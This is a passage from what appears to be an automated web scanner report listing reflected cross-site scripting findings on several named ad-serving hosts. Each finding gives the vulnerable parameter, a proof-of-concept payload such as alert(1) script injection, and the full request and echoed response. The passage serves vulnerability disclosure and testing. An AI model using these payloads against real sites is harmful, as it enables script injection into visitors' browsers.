Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30306502843_1320110936","http://ad.doubleclick.net/adj/q1.politico/home_run_of;net=q1;u=,q1-30306502843_1320110936,,none,;;sz=fb6ff'-alert(1)-'c85e9da208c;cmw=nurl;contx=none;dc=s;btg=?","fb6ff'-alert(1)-'c85e9da208c","",true);</scr'+'ipt>
...[SNIP]...

3.9. http://ad.coupons.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.coupons.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91333"-alert(1)-"e457910bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=160x210&noBT=0&npage=1&spage=.com/&btcat=100&entity=29890&site_code=13306iq3710&pid=13306&zid=iq37&nid=10&section_code=INSERT_SECTION_CODE_HERE&user=wocbar&p84521=E10312011D1204D645092189&c84521=xXVKRv2iYdqnFMisz5ihjZU32SOzJ&p84965=E10312011D1204D308539987&c84965=qY6fvauqC5k41BjGleLZTaYSfZo5k&p84947=E10312011D1204D472920716&c84947=T1E6OnhNTfysIAuMrDNG3DAQPnt1q&p84957=E10312011D1204D953106165&c84957=PCjL3EQdXEPQHTlrl63qQrrzSKIgb&91333"-alert(1)-"e457910bfe=1 HTTP/1.1
Host: ad.coupons.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://couponbar.coupons.com/adblob.asp?AdSize=160x210&pzn=13306iq3710&req=1320087850320&zip=&did=&spage=.com/&npage=1
Cookie: UserInfo=mac=H&uid=H&acc=EASRMUBAA&isPrinterSupported=0&groupid=0%2C0%2C0&nid=H&ZIP=&rememberMeCookie=0&UserKey=%2Fh%2FDs1ZHTOB%2BrsASEvi1T8OW%2FL9Hb09kTHVDJEZyT21NYU5pQ2tB&cbStatus=0&isInitialSSOReg=0&euid=&appid=&redirectToLamp=0; SessionInfo=TrackingID=ALK10311204081DC0CB6203106106&SI=iG0O=Fwb!hWWGW_iAGnzERqwKPofIpMqfJf:|:@OZAq=O:|:T~lmga.OD=%:|:H9VZRP83=A:|:kG~ws8_=C:|:JIC^=K:|:PUK3SCG5pQ=e$:|:TDz%^YEZA=h6:|:Q!f=g:|:9XV=w!sHZap__Upbti.6_MpIZuJ5XjWdv5:|:9.tYWSpol!94~raTNO%=o:|:M5eyS%%_=_:|:PS.=l:|:PNd1sDF$ARB=44:|:ftCBkH=$:|:nXLojpd=7:|:n1AH3a=B:|:7BP9te1=z:|:MBIAkBF=_:|:hIJ7=W:|:%~Y@t4r.0=f:|:F@E%^=NU.4Jf&sC=yxzLLsYRc=fJ:|:glc_dul5jyE~8=D1:|:63ihezy%~F=0%b/3O/csZPPsJ4o; __utma=94333583.1002706944.1320087848.1320087848.1320087848.1; __utmb=94333583.3.9.1320087848; __utmc=94333583; __utmz=94333583.1320087848.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 31 Oct 2011 19:04:23 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 31 Oct 2011 19:04:23 GMT
Pragma: no-cache
Age: 99
Proxy-Connection: keep-alive
Content-Length: 4584

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.coupons.com/imp?91333"-alert(1)-"e457910bfe=1&Z=160x210&btcat=100&c84521=xXVKRv2iYdqnFMisz5ihjZU32SOzJ&c84947=T1E6OnhNTfysIAuMrDNG3DAQPnt1q&c84957=PCjL3EQdXEPQHTlrl63qQrrzSKIgb&c84965=qY6fvauqC5k41BjGleLZTaYSfZo5k&e=29890&nid=10&noBT=0&npage=1&
...[SNIP]...

3.10. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b83c"><script>alert(1)</script>920bf81711c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=9b83c"><script>alert(1)</script>920bf81711c&sp=y HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27180&s=27181
Cookie: optOut=1; uid=3827355846744503244; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C21%7C2%7C5%7C1001%7C1004%7C1010; rds=15267%7C15267%7C15267%7C15267%7C15279%7C15267%7C15267%7C15267%7C15271%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15279%7C15267; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:31:39 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3827355846744503244&rnd=4585053464496052570&fpid=9b83c"><script>alert(1)</script>920bf81711c&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.11. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0264"><script>alert(1)</script>a3a5e653a48 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=d0264"><script>alert(1)</script>a3a5e653a48 HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=27180&s=27181
Cookie: optOut=1; uid=3827355846744503244; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C21%7C2%7C5%7C1001%7C1004%7C1010; rds=15267%7C15267%7C15267%7C15267%7C15279%7C15267%7C15267%7C15267%7C15271%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15267%7C15279%7C15267; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 01 Nov 2011 01:31:39 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3827355846744503244&rnd=4335739272196400654&fpid=1&nu=n&t=&sp=d0264"><script>alert(1)</script>a3a5e653a48&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.12. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1418"-alert(1)-"a3622220cf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?anmember=541&anprice=&ad_type=ad&ad_size=300x250&section=1921728&referrer=http://www.politico.com/index.html&b1418"-alert(1)-"a3622220cf1=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:42:25 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 01 Nov 2011 01:42:25 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4266

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?Z=300x250&anmember=541&anprice=&b1418"-alert(1)-"a3622220cf1=1&referrer=http%3a%2f%2fwww.politico.com%2findex.html&s=1921728&_salt=3327376166";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Ar
...[SNIP]...

3.13. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6607a"><script>alert(1)</script>fedfa55f3ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=2300359&6607a"><script>alert(1)</script>fedfa55f3ca=1 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 02:13:58 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 01 Nov 2011 02:13:58 GMT
Pragma: no-cache
Age: 0
Proxy-Connection: keep-alive
Content-Length: 4607

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?6607a"><script>alert(1)</script>fedfa55f3ca=1&Z=728x90&s=2300359&_salt=467812189&t=2" target="_parent">
...[SNIP]...

3.14. http://adnxs.revsci.net/imp [Z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 825f5'-alert(1)-'bc1f7844b9a was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90825f5'-alert(1)-'bc1f7844b9a&s=1889588&r=1&_salt=501357491&u=http%3A%2F%2Fwww.politico.com%2Findex.html HTTP/1.1
Host: adnxs.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:42:37 GMT
Content-Length: 496

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90825f5'-alert(1)-'bc1f7844b9a&referrer=http://www.politico.com/index.html&inv_code=1889588&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90825f5%27-alert%281%29-%27bc1f7844b9
...[SNIP]...

3.15. http://adnxs.revsci.net/imp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76292'-alert(1)-'5914a4e1bc was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=188958876292'-alert(1)-'5914a4e1bc&r=1&_salt=501357491&u=http%3A%2F%2Fwww.politico.com%2Findex.html HTTP/1.1
Host: adnxs.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:42:46 GMT
Content-Length: 494

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://www.politico.com/index.html&inv_code=188958876292'-alert(1)-'5914a4e1bc&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D188958876292%27-alert%281%29-%275914a4e1bc%26r%3D1%26_salt%3D501357491%26u%3Dhttp%253A%25
...[SNIP]...

3.16. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7417d<script>alert(1)</script>4dfdaf9fc1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7426977417d<script>alert(1)</script>4dfdaf9fc1e?d=3827355846744503244 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3827355846744503244&rnd=4482520784424853993&fpid=13&nu=n&t=&sp=n&purl=&ctid=1
Cookie: Apache="168296556x0.184+1312290886x-1235322650"; untarget=1

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 01 Nov 2011 02:17:59 GMT
Server: XPEHOTEHb/1.1
Content-Length: 78

Unsupported URL: /adserver/vdi/7426977417d<script>alert(1)</script>4dfdaf9fc1e

3.17. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 83e9a<script>alert(1)</script>69ceae6dc70 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1387828&pid=120176783e9a<script>alert(1)</script>69ceae6dc70&ps=-1&zw=588&zh=250&url=http%3A//www.politico.com/news/stories/1011/67294.html&v=5&dct=Herman%20Cain%27s%20story%20divides%20conservatives%20-%20Alexander%20Burns%20and%20Keach%20Hagey%20-%20POLITICO.com&ref=http%3A//www.politico.com/&metakw=2012%20Elections,Herman%20Cain,National%20Restaurant%20Association,Karl%20Rove,Rush%20Limbaugh HTTP/1.1
Host: ads.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/news/stories/1011/67294.html
Cookie: oo_flag=t; s_pers=%20s_getnr%3D1316296773437-New%7C1379368773437%3B%20s_nrgvo%3DNew%7C1379368773439%3B

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:30:51 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2529


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "120176783e9a<script>alert(1)</script>69ceae6dc70"

   
                                                           </head>
...[SNIP]...

3.18. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload c7df2--><script>alert(1)</script>aa10569b39e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1387828c7df2--><script>alert(1)</script>aa10569b39e&pid=1201767&ps=-1&zw=588&zh=250&url=http%3A//www.politico.com/news/stories/1011/67294.html&v=5&dct=Herman%20Cain%27s%20story%20divides%20conservatives%20-%20Alexander%20Burns%20and%20Keach%20Hagey%20-%20POLITICO.com&ref=http%3A//www.politico.com/&metakw=2012%20Elections,Herman%20Cain,National%20Restaurant%20Association,Karl%20Rove,Rush%20Limbaugh HTTP/1.1
Host: ads.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/news/stories/1011/67294.html
Cookie: oo_flag=t; s_pers=%20s_getnr%3D1316296773437-New%7C1379368773437%3B%20s_nrgvo%3DNew%7C1379368773439%3B

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:30:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Content-Length: 3420
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1387828c7df2--><script>alert(1)</script>aa10569b39e" -->
...[SNIP]...

3.19. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload ffb30--><script>alert(1)</script>338e101eb1d was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1387828&pid=1201767&ps=-1ffb30--><script>alert(1)</script>338e101eb1d&zw=588&zh=250&url=http%3A//www.politico.com/news/stories/1011/67294.html&v=5&dct=Herman%20Cain%27s%20story%20divides%20conservatives%20-%20Alexander%20Burns%20and%20Keach%20Hagey%20-%20POLITICO.com&ref=http%3A//www.politico.com/&metakw=2012%20Elections,Herman%20Cain,National%20Restaurant%20Association,Karl%20Rove,Rush%20Limbaugh HTTP/1.1
Host: ads.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/news/stories/1011/67294.html
Cookie: oo_flag=t; s_pers=%20s_getnr%3D1316296773437-New%7C1379368773437%3B%20s_nrgvo%3DNew%7C1379368773439%3B

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:31:03 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Content-Length: 3859
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1ffb30--><script>alert(1)</script>338e101eb1d" -->
   
...[SNIP]...

3.20. http://adserving.cpxinteractive.com/st [ad_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c41c'-alert(1)-'5514d5e74be was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x2507c41c'-alert(1)-'5514d5e74be&section=1921728&referrer=http://www.politico.com/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:42:54 GMT
Content-Length: 446

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x2507c41c'-alert(1)-'5514d5e74be&inv_code=1921728&referrer=http://www.politico.com/index.html&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x2507c41c%27-alert
...[SNIP]...

3.21. http://adserving.cpxinteractive.com/st [section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 841ee'-alert(1)-'b206036ced2 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1921728841ee'-alert(1)-'b206036ced2&referrer=http://www.politico.com/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/index.html

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
